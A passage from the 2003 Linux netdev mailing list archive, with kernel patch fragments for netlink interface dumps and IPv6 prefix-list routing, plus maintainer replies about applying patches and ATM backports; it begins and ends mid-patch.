+	nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r));
+	if (pid) nlh->nlmsg_flags |= NLM_F_MULTI;
+	r = NLMSG_DATA(nlh);
+	r->ifi_family = AF_INET;
+	r->ifi_type = dev->type;
+	r->ifi_index = dev->ifindex;
+	r->ifi_flags = dev->flags;
+	r->ifi_change = 0;
+
+	if (!netif_running(dev) || !netif_carrier_ok(dev))
+		r->ifi_flags &= ~IFF_RUNNING;
+	else
+		r->ifi_flags |= IFF_RUNNING;
+
+	RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name);
+
+	/* Some more IFLA_* attribute for convenience? IPv4-ized MTU
+	 * would be good idea.
+	 */
+
+	subattr = (struct rtattr*)skb->tail;
+	RTA_PUT(skb, IFLA_PROTINFO, 0, NULL);
+	RTA_PUT(skb, IFLA_INET_CONF, sizeof(int)*16, &in_dev->cnf);
+	RTA_PUT(skb, IFLA_INET_NEIGH, sizeof(int)*13, &in_dev->arp_parms->base_reachable_time);
+	subattr->rta_len = skb->tail - (u8*)subattr;
+
+	nlh->nlmsg_len = skb->tail - b;
+	return skb->len;
+
+nlmsg_failure:
+rtattr_failure:
+	skb_trim(skb, b - skb->data);
+	return -1;
+}
+
+
+int inet_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb)
+{
+	int idx, err;
+	int s_idx = cb->args[0];
+	struct net_device *dev;
+	struct in_device *in_dev;
+
+	read_lock(&dev_base_lock);
+	for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) {
+		if (idx < s_idx)
+			continue;
+		if ((in_dev = in_dev_get(dev)) == NULL)
+			continue;
+		err = inet_fill_ifinfo(skb, dev, in_dev, RTM_NEWLINK, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq);
+		in_dev_put(in_dev);
+		if (err <= 0)
+			break;
+	}
+	read_unlock(&dev_base_lock);
+	cb->args[0] = idx;
+
+	return skb->len;
+}
+
+
 static struct rtnetlink_link inet_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = {
-	[4] = { .doit = inet_rtm_newaddr, },
-	[5] = { .doit = inet_rtm_deladdr, },
-	[6] = { .dumpit = inet_dump_ifaddr, },
-	[8] = { .doit = inet_rtm_newroute, },
-	[9] = { .doit = inet_rtm_delroute, },
-	[10] = { .doit = inet_rtm_getroute, .dumpit = inet_dump_fib, },
+	[RTM_GETLINK - RTM_BASE] = { .dumpit = inet_dump_ifinfo, },
+	[RTM_NEWADDR - RTM_BASE] = { .doit = inet_rtm_newaddr, },
+	[RTM_DELADDR - RTM_BASE] = { .doit = inet_rtm_deladdr, },
+	[RTM_GETADDR - RTM_BASE] = { .dumpit = inet_dump_ifaddr, },
+	[RTM_NEWROUTE - RTM_BASE] = { .doit = inet_rtm_newroute, },
+	[RTM_DELROUTE - RTM_BASE] = { .doit = inet_rtm_delroute, },
+	[RTM_GETROUTE - RTM_BASE] = { .doit = inet_rtm_getroute, .dumpit = inet_dump_fib, },
 #ifdef CONFIG_IP_MULTIPLE_TABLES
-	[16] = { .doit = inet_rtm_newrule, },
-	[17] = { .doit = inet_rtm_delrule, },
-	[18] = { .dumpit = inet_dump_rules, },
+	[RTM_NEWRULE - RTM_BASE] = { .doit = inet_rtm_newrule, },
+	[RTM_DELRULE - RTM_BASE] = { .doit = inet_rtm_delrule, },
+	[RTM_GETRULE - RTM_BASE] = { .dumpit = inet_dump_rules, },
 #endif
 };
 

From davem@redhat.com Sun Jul 20 21:57:49 2003
Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 21:58:02 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L4vmFl005357 for ; Sun, 20 Jul 2003 21:57:48 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA07148; Sun, 20 Jul 2003 21:46:53 -0700
Date: Sun, 20 Jul 2003 21:46:53 -0700
From: "David S. Miller"
To: kuznet@ms2.inr.ac.ru
Cc: krkumar@us.ibm.com, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com, linux-net@vger.kernel.org
Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21
Message-Id: <20030720214653.2de7ce82.davem@redhat.com>
In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru>
References: <3F17245D.9040806@us.ibm.com> <200307210155.FAA31320@dub.inr.ac.ru>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4200
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Mon, 21 Jul 2003 05:55:04 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote:

> The patch is not quite complete: except for those two questions,
> I forgot to add MTU truncated to its IPv4 value, did nothing
> for multicast things (I still cannot figure out, what information is
> really useful) and did not add active notifications which would be good
> to be made after sysctl parameters are changed.

Please let us to use some portable types instead of 'int' :-) It is just minor nit, I otherwise like the whole idea.

Why are we limited to arrays of 'u32' or whatever? RTA_PUT() can place arbitrary things into the message and length is given.

From davem@redhat.com Mon Jul 21 01:59:40 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 01:59:48 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L8xdFl017345 for ; Mon, 21 Jul 2003 01:59:40 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id BAA00853; Mon, 21 Jul 2003 01:57:40 -0700
Date: Mon, 21 Jul 2003 01:57:39 -0700
From: "David S. Miller"
To: James Morris
Cc: sneakums@zork.net, netdev@oss.sgi.com
Subject: Re: [PATCH] correct 'discvovery' typo
Message-Id: <20030721015739.49ee1ce2.davem@redhat.com>
In-Reply-To:
References: <6ubrvo7v51.fsf@zork.zork.net>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4201
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Mon, 21 Jul 2003 11:02:35 +1000 (EST) James Morris wrote:

> On Sun, 20 Jul 2003, Sean Neakums wrote:
>
> > Against 2.6.0-test1.
>
> Applied to bk://kernel.bkbits.net/jmorris/net-2.5

Pulled, thanks James.

From davem@redhat.com Mon Jul 21 05:20:11 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:20:30 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCK9Fl001459 for ; Mon, 21 Jul 2003 05:20:10 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01714; Mon, 21 Jul 2003 05:17:33 -0700
Date: Mon, 21 Jul 2003 05:17:33 -0700
From: "David S. Miller"
To: Krishna Kumar
Cc: yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com
Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73
Message-Id: <20030721051733.2f2e9fb7.davem@redhat.com>
In-Reply-To:
References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4202
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Thu, 17 Jul 2003 17:37:18 -0700 (PDT) Krishna Kumar wrote:

> ------------------- Patch for prefix list against 2.5.73 ------------

Ok, I tried to apply this, but it had lots of rejects, here is why.

> diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c
> --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700
> +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700
 ...
> @@ -1330,7 +1330,8 @@
>  }
>  } else if (pinfo->onlink && valid_lft) {
>  addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len,

The "pinfo->onlink" part of this if test does not exist in the sources, so patch application failed.

You're mixing this patch up with other changes in your tree already.

Please repatch against current 2.6.x sources. Thanks.
From davem@redhat.com Mon Jul 21 05:26:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:26:39 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCQPFl004204 for ; Mon, 21 Jul 2003 05:26:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01753; Mon, 21 Jul 2003 05:24:16 -0700 Date: Mon, 21 Jul 2003 05:24:16 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] minor cleanups for 2.5 Message-Id: <20030721052416.3ef97f3b.davem@redhat.com> In-Reply-To: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> References: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4203 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 17:18:04 -0400 chas williams wrote: > (and how does __inline__ work > when its the timer function?) If you take the address of a function marked inline, gcc outputs a non-inline of the function. All of your ATM patches applied, thanks Chas. From davem@redhat.com Mon Jul 21 05:27:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:28:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCRkFl004573 for ; Mon, 21 Jul 2003 05:27:46 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01774; Mon, 21 Jul 2003 05:25:52 -0700 Date: Mon, 21 Jul 2003 05:25:52 -0700 From: "David S. 
Miller" To: "David S. Miller" Cc: netdev@oss.sgi.com, linux-net@vger.kernel.org, zwane@arm.linux.org.uk Subject: Re: Fw: [PATCH][2.6] propogate rx errors from raw_rcv_skb Message-Id: <20030721052552.7536fccc.davem@redhat.com> In-Reply-To: <20030716195345.21b9b9fc.davem@redhat.com> References: <20030716195345.21b9b9fc.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4204 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 19:53:45 -0700 "David S. Miller" wrote: > This looks somewhat sane, ipv6 doesn't seem to need it as it > always returns 0 Nothing that calls raw_rcv() checks the return value, so what's the point? From davem@redhat.com Mon Jul 21 05:32:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:32:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCW2Fl005124 for ; Mon, 21 Jul 2003 05:32:03 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01807; Mon, 21 Jul 2003 05:30:02 -0700 Date: Mon, 21 Jul 2003 05:30:02 -0700 From: "David S. 
Miller" To: chas williams Cc: netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm backports for 2.4 Message-Id: <20030721053002.2051b791.davem@redhat.com> In-Reply-To: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> References: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4205 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Chas, Marcelo is closing the door on anything but critical bug fixes for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM backports to 2.4.23-pre1. From davem@redhat.com Mon Jul 21 05:33:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:33:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCXVFl005494 for ; Mon, 21 Jul 2003 05:33:31 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01818; Mon, 21 Jul 2003 05:31:25 -0700 Date: Mon, 21 Jul 2003 05:31:25 -0700 From: "David S. 
Miller" To: Christoph Hellwig Cc: netdev@oss.sgi.com Subject: Re: [PATCH] fix arcnet module refcounting Message-Id: <20030721053125.2d28d233.davem@redhat.com> In-Reply-To: <20030713125748.GA24403@lst.de> References: <20030713125748.GA24403@lst.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4206 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 14:57:48 +0200 Christoph Hellwig wrote: > struct arnet_local needs a struct module *owner, that also cleans > up nicely lots of the code. Applied, thanks Christoph. From chas@locutus.cmf.nrl.navy.mil Mon Jul 21 08:04:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:04:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LF43Fl014638 for ; Mon, 21 Jul 2003 08:04:04 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6LF3xsG012085; Mon, 21 Jul 2003 11:03:59 -0400 (EDT) Message-Id: <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][2.4] more atm backports for 2.4 In-reply-to: Your message of "Mon, 21 Jul 2003 05:30:02 PDT." <20030721053002.2051b791.davem@redhat.com> Date: Mon, 21 Jul 2003 11:01:26 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . 
com / mimedefang) X-archive-position: 4207 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030721053002.2051b791.davem@redhat.com>,"David S. Miller" writes: >Chas, Marcelo is closing the door on anything but critical bug fixes >for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM >backports to 2.4.23-pre1. how about the fix for the config file mess? From chas@locutus.cmf.nrl.navy.mil Mon Jul 21 08:06:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:06:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LF66Fl015062 for ; Mon, 21 Jul 2003 08:06:07 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6LF63sG012139; Mon, 21 Jul 2003 11:06:03 -0400 (EDT) Message-Id: <200307211506.h6LF63sG012139@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM] minor cleanups for 2.5 In-reply-to: Your message of "Mon, 21 Jul 2003 05:24:16 PDT." <20030721052416.3ef97f3b.davem@redhat.com> Date: Mon, 21 Jul 2003 11:03:30 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4208 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030721052416.3ef97f3b.davem@redhat.com>,"David S. Miller" writes: >> (and how does __inline__ work >> when its the timer function?) > >If you take the address of a function marked inline, >gcc outputs a non-inline of the function. i figured that. 
tagging this function inline is essentially pointless. (which was sort of my point in a roundabout way) From davem@redhat.com Mon Jul 21 08:18:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:18:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LFIDFl016272 for ; Mon, 21 Jul 2003 08:18:13 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id IAA04689; Mon, 21 Jul 2003 08:16:03 -0700 Date: Mon, 21 Jul 2003 08:16:03 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm backports for 2.4 Message-Id: <20030721081603.529b4c58.davem@redhat.com> In-Reply-To: <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> References: <20030721053002.2051b791.davem@redhat.com> <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4209 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 21 Jul 2003 11:01:26 -0400 chas williams wrote: > In message <20030721053002.2051b791.davem@redhat.com>,"David S. Miller" writes: > >Chas, Marcelo is closing the door on anything but critical bug fixes > >for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM > >backports to 2.4.23-pre1. > > how about the fix for the config file mess? I pushed that one, don't worry. 
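On the `__inline__` question raised earlier in this thread: a minimal user-space sketch of why marking a timer callback inline buys nothing. All names here (`demo_timer`, `demo_timeout`, `demo_run`) are hypothetical and are not taken from the ATM code. Once the function's address is stored in a structure, the compiler has to keep an out-of-line copy, and the call through the pointer is an ordinary indirect call.

```c
/* Hypothetical callback type, standing in for a kernel timer function. */
typedef void (*demo_timer_fn)(unsigned long data);

/* Records the argument of the last callback invocation. */
static unsigned long demo_fired_with;

/* Marked inline, but its address is taken in demo_run() below, so the
 * compiler must also emit a normal, callable copy of the function. */
static inline void demo_timeout(unsigned long data)
{
    demo_fired_with = data;
}

/* Hypothetical minimal timer: a function pointer plus its argument. */
struct demo_timer {
    demo_timer_fn function;
    unsigned long data;
};

/* The callback is reached through a pointer; in general the compiler
 * cannot inline the callee at this call site. */
static void demo_timer_fire(struct demo_timer *t)
{
    t->function(t->data);
}

/* Arms the hypothetical timer with demo_timeout and fires it once. */
unsigned long demo_run(unsigned long data)
{
    struct demo_timer t = { demo_timeout, data };

    demo_timer_fire(&t);
    return demo_fired_with;
}
```

Calling `demo_run(42UL)` goes through the stored pointer and returns the value the callback recorded; the `inline` keyword makes no difference to the result.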
From krkumar@us.ibm.com Mon Jul 21 10:20:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 10:20:09 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LHK1Fl006734 for ; Mon, 21 Jul 2003 10:20:02 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6LHIvUj260134; Mon, 21 Jul 2003 13:18:59 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6LHIslm138830; Mon, 21 Jul 2003 11:18:55 -0600 Date: Mon, 21 Jul 2003 10:16:58 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: "David S. Miller" cc: yoshfuji@linux-ipv6.org, , , , Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 In-Reply-To: <20030721051733.2f2e9fb7.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4210 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Ok, I tried to apply this, but it had lots of rejects, here > is why. > > > diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c > > --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 > > +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 > ... > > @@ -1330,7 +1330,8 @@ > > } > > } else if (pinfo->onlink && valid_lft) { > > addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, > > The "pinfo->onlink" part of this if test does not exist > in the sources, so patch application failed. > > You're mixing this patch up with other changes in your > tree already. 
The problem happened since the patch was against 2.5.73, and this line seems to have been changed sometime after that before 2.6.0. Following is the prefix list (only) patch against 2.6.0-test1 bits. Thanks, - KK ------------------------------------------------------------------------------- diff -ruN linux-2.6.0-test1.org/include/linux/ipv6_route.h linux-2.6.0-test1.new/include/linux/ipv6_route.h --- linux-2.6.0-test1.org/include/linux/ipv6_route.h 2003-07-13 20:31:50.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/ipv6_route.h 2003-07-21 09:50:54.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.6.0-test1.org/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- linux-2.6.0-test1.org/include/linux/rtnetlink.h 2003-07-13 20:37:13.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-21 09:51:29.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.6.0-test1.org/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- linux-2.6.0-test1.org/net/ipv6/addrconf.c 2003-07-13 20:38:06.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-21 09:56:19.000000000 -0700 @@ -130,7 +130,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void 
addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -716,7 +716,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1249,7 +1249,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1276,7 +1276,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1369,7 +1369,7 @@ } } else if (valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1415,7 +1415,7 @@ } update_lft = create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp) { @@ -1588,7 +1588,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1763,7 +1763,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -2002,8 +2002,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = 
ifp->idev->dev->ifindex; @@ -2017,7 +2016,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -2027,7 +2026,8 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, + flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.6.0-test1.org/net/ipv6/route.c linux-2.6.0-test1.new/net/ipv6/route.c --- linux-2.6.0-test1.org/net/ipv6/route.c 2003-07-13 20:36:42.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/route.c 2003-07-21 09:58:11.000000000 -0700 @@ -1452,13 +1452,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct 